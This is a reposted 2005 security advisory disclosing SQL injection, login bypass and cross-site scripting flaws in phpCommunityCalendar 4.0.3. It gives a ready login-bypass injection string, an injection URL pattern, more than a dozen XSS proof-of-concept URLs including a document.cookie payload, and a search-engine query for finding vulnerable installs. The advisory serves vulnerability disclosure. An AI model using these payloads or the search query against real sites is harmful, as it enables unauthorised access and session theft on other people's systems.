Security Advisory: phpCommunityCalendar 4.0.3 (possibly prior versions) sql injection / login bypass / cross site scripting

[EN] securityvulns.ru
no-pyccku

Related information
  Web applications security vulnerabilities (PHP, ASP, CGI, Perl, etc)
  Cj Desing Three Aplications One Bug
  class-1 Forum Software v 0.24.4 Remote code execution
  [SA16731] MAXdev MD-Pro Cross-Site Scripting and File Upload Vulnerabilities
  [SA16726] Unclassified NewsBoard "Description"
Script Insertion Vulnerability

From: retrogod_(at)_aliceposta.it <retrogod_(at)_aliceposta.it>
Date: 07.09.2005
Subject: phpCommunityCalendar 4.0.3 (possibly prior versions) sql injection / login bypass / cross site scripting

phpCommunityCalendar 4.0.3 (possibly prior versions)
sql injection / login bypass / cross site scripting

software:
site: http://open.appideas.com
download: http://open.appideas.com/Calendar/

1) sql injection / login bypass:
"admin" directory contains tools for the site administrator. "webadmin" contains tools for category
administrators. If magic quotes off a user can bypass category admin check modifying sql login query, example:
go to http://[target]/[path]/webadmin/login.php and use this:

login: ' or isnull(1/0) /*
password: [nothing here]

now you can add, delete, modify events

2) sql injection:

http://[target]/[path]/week.php?LocationID=-1'[INJECTION]%20/*

3) "admin" directory should be password protected by .htaccess , if not you can
go to control panel as main admin

http://[target]/[path]/admin/

4) cross site scripting, poc:

4.1) add an event and fill some fields with this:

\'\);</script><script>alert(document.
cookie)</script>

4.2) check this urls:

http://[target]/[path]/thankyou.
php?LocationID="><script>alert('LOL')</s
cript>
http://[target]/[path]/calDaily.
php?font="><script>alert('LOL')</script>
<"
http://[target]/[path]/calMonthly.
php?font="><script>alert('LOL')</scrip
t><"
http://[target]/[path]/calMonthlyP.
php?font="><script>alert('LOL')</scri
pt><"
http://[target]/[path]/calWeekly.
php?font="><script>alert('LOL')</script
><"
http://[target]/[path]/calWeeklyP.
php?font="><script>alert('LOL')</scrip
t><"
http://[target]/[path]/calYearly.
php?font="><script>alert('LOL')</script
><"
http://[target]/[path]/calYearlyP.
php?font="><script>alert('LOL')</scrip
t><"
http://[target]/[path]/day.
php?font="><script>alert('LOL')</script><!
--
http://[target]/[path]/day.
php?LocationID="><script>alert('LOL')</script
><!--
http://[target]/[path]/event.
php?font="><script>alert('LOL')</script>
http://[target]/[path]/event.
php?CeTi=</title><script>alert('LOL')</scri
pt>
http://[target]/[path]/event.
php?Contact=<script>alert('LOL')</script>
http://[target]/[path]/event.
php?Description=<script>alert('LOL')</scrip
t>
http://[target]/[path]/event.
php?ShowAddress=<script>alert('LOL')</scrip
t>
http://[target]/[path]/week.
php?font="><script>alert('LOL')</script>

and so on... (a lot of uninitizialized vars showned)

googledork: "Calendar programming by AppIdeas.com" filetype:php

rgod
site: http://rgod.altervista.org
mail: retrogod (at) aliceposta (dot) it [email concealed]

original advisory: http://www.rgod.altervista.org/phpccal.html